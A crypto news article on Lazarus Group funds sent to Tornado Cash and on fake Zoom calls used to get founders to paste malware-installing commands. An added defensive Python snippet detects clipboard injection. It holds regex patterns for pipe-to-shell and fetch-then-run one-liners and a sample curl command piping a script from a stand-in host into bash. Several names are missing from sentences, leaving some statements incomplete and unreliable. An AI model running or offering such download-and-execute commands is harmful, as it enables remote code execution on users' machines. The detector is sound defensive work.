Lazarus Group Deposits 400 ETH to Tornado Cash, Hackers Target Crypto Vets on Zoom

Author: Cryptonews
Published: 2025-03-13 12:22:54

The notorious North Korean hackers known as the Lazarus Group continue to move the crypto funds they’ve stolen in recent exploits. And now, alleged North Korean hackers are targeting crypto execs via Zoom.

Blockchain security firm CertiK posted on 13 March that this group had deposited 400 ETH to the popular Tornado Cash mixing service. This amount is currently worth $759,444.

And there is no sign of the group stopping their activities. “Stay vigilant,” the post warns.

#CertiKInsight🚨

We have detected deposit of 400 ETH in https://t.co/0lwPdz0OWi on Ethereum from:
0xdB31a812261d599A3fAe74Ac44b1A2d4e5d00901
0xB23D61CeE73b455536EF8F8f8A5BadDf8D5af848.

The fund traces to the Lazarus group’s activity on the Bitcoin network.

Stay Vigilant! pic.twitter.com/IHwFwt5uQs

— CertiK Alert (@CertiKAlert) March 13, 2025

Lazarus is the infamous group of hackers connected to some of crypto’s most high-profile attacks. These include the network hack, which saw the loss of $624 million in 2022.

And just recently, in February, the group stole $1.4 billion in crypto from the exchange hack.

The crypto space has been carefully observing the movement of all these funds, given that the attackers aim to launder it all.

Worryingly, cybersecurity experts have warned that Lazarus has been deploying novel, sophisticated, and constantly evolving crypto-stealing malware aimed at crypto developers.

More specifically, for months now, North Korea has been targeting developers via NPM supply chain attacks. The goal is to steal funds and data.

Additionally, the malware seeks to infiltrate popular cryptocurrency wallets. Various reports have named,, andas popular targets.


North Korean Hackers Target Crypto Founders via Zoom

Recently, there has been a different kind of threat looming, targeting crypto company founders.

Hackers are working to steal data and funds through a fake Zoom call. They typically set up a business meeting and once on the call, they pretend they’re experiencing issues.

They post “a stock video of a bored” venture capitalist on the screen, and ask the target to click a link they sent to a fake new call. But it’s malware.

All this is according to Nick Bax of the. He said the threat group stole “$10s of millions of dollars” using this tactic, and others are copying it.

Having audio issues on your Zoom call? That’s not a VC, it’s North Korean hackers.

Fortunately, this founder realized what was going on.

The call starts with a few "VCs" on the call. They send messages in the chat saying they can’t hear your audio, or suggesting there’s an… pic.twitter.com/ZnW8Mtof4F

— Nick Bax.eth (@bax1337) March 11, 2025

Meanwhile, the hackers are currently presumed to be North Korean, but this is unverified.

Groups linked to North Korea “have become notorious for their sophisticated and relentless tradecraft,” according to a Chainalysis report. In 2024, they stole $1.34 billion across 47 incidents – 61% of the total amount stolen for the year, and 20% of total incidents.

That said, Giulio Xiloyannis, the CEO ofand cofounder of, shared his own recent experience. He also received a Zoom link that makes people install malware.

Great example of the North Korean Zoom audio hacking method.

The commands in the screenshot are harmless but when you click the copy button, it adds an additional curl command that downloads/runs a malicious file. https://t.co/Mhd46KhTKq

— Nick Bax.eth (@bax1337) March 12, 2025

Luckily, Xiloyannis noticed red flags, and the hackers failed. “There were tellsigns,” he said. “Opens browser Zoom without asking to use the App, asking me to paste code on my “terminal”.”
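The copy-button trick described above can be caught by comparing what the page displayed with what actually landed on the clipboard before anything is pasted into a terminal. The following is an added example, not code from the article or from anyone quoted in it; the sample commands, the `example.invalid` URL and all function names are constructed for illustration.

```python
import re

# Patterns for "download and execute" one-liners.
FETCH = r"\b(?:curl|wget)\b"
SHELL = r"(?:ba|z|da)?sh\b"
RISKY = [
    # curl ... | bash
    ("pipe-to-shell",
     re.compile(FETCH + r"[^\n|;&]*\|\s*(?:sudo\s+)?" + SHELL)),
    # bash -c "$(curl ...)"  or  bash <(curl ...)
    ("shell-on-substitution",
     re.compile(r"\b" + SHELL + r"[^\n]*(?:\$\(|<\(|`)\s*" + FETCH)),
    # curl -o f ... && chmod +x f   /   curl ... ; ./f
    ("fetch-then-run",
     re.compile(FETCH + r"[^\n]*(?:&&|;)\s*(?:chmod\s+\+x|(?:ba|z)?sh\s|\./)")),
]

def split_commands(text):
    """Split shell text into whitespace-normalised commands on newline, ';' and '&&'."""
    return [" ".join(p.split()) for p in re.split(r"\n|;|&&", text) if p.strip()]

def audit_clipboard(displayed, clipboard):
    """Report commands the copy button added and any download-and-run patterns."""
    shown = set(split_commands(displayed))
    injected = [c for c in split_commands(clipboard) if c not in shown]
    flags = sorted(name for name, rx in RISKY if rx.search(clipboard))
    return {"injected": injected, "flags": flags,
            "safe": not injected and not flags}

# Constructed sample: harmless commands shown on the page ...
DISPLAYED = 'echo "checking audio devices"\nuname -a\n'
# ... and the clipboard contents after the copy button appended a fetch.
CLIPBOARD = DISPLAYED + "curl -s https://updates.example.invalid/fix.sh | bash\n"

if __name__ == "__main__":
    report = audit_clipboard(DISPLAYED, CLIPBOARD)
    print("safe to paste:", report["safe"])
    for cmd in report["injected"]:
        print("not shown on page:", cmd)
    print("patterns:", ", ".join(report["flags"]) or "none")
```

Pasting the clipboard into a plain-text editor first gives the same comparison by eye; the script only makes the mismatch explicit.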

Moreover, Melbin Thomas, founder of, David Zhang, cofounder of, Christoph Mussenbrock, cofounder of blockchain platform, and several other people reported similar attempted hacks.

Another day another North Korean scammer
This time using the same "fake Zoom" scam that’s been popular recently
I’ll detail what happened to me in this🧵pic.twitter.com/X5UZAKJjR0

— David Zhang (▲) (@dazhengzhang) March 12, 2025

This is unlikely to stop. Chainalysis noted that North Korean hackers employ advanced malware, social engineering, and cryptocurrency theft to fund state-sponsored operations and circumvent international sanctions.

Additionally, Tom Robinson, co-founder of crypto investigation firm, warned that North Korea is the most advanced player when it comes to laundering stolen digital assets.

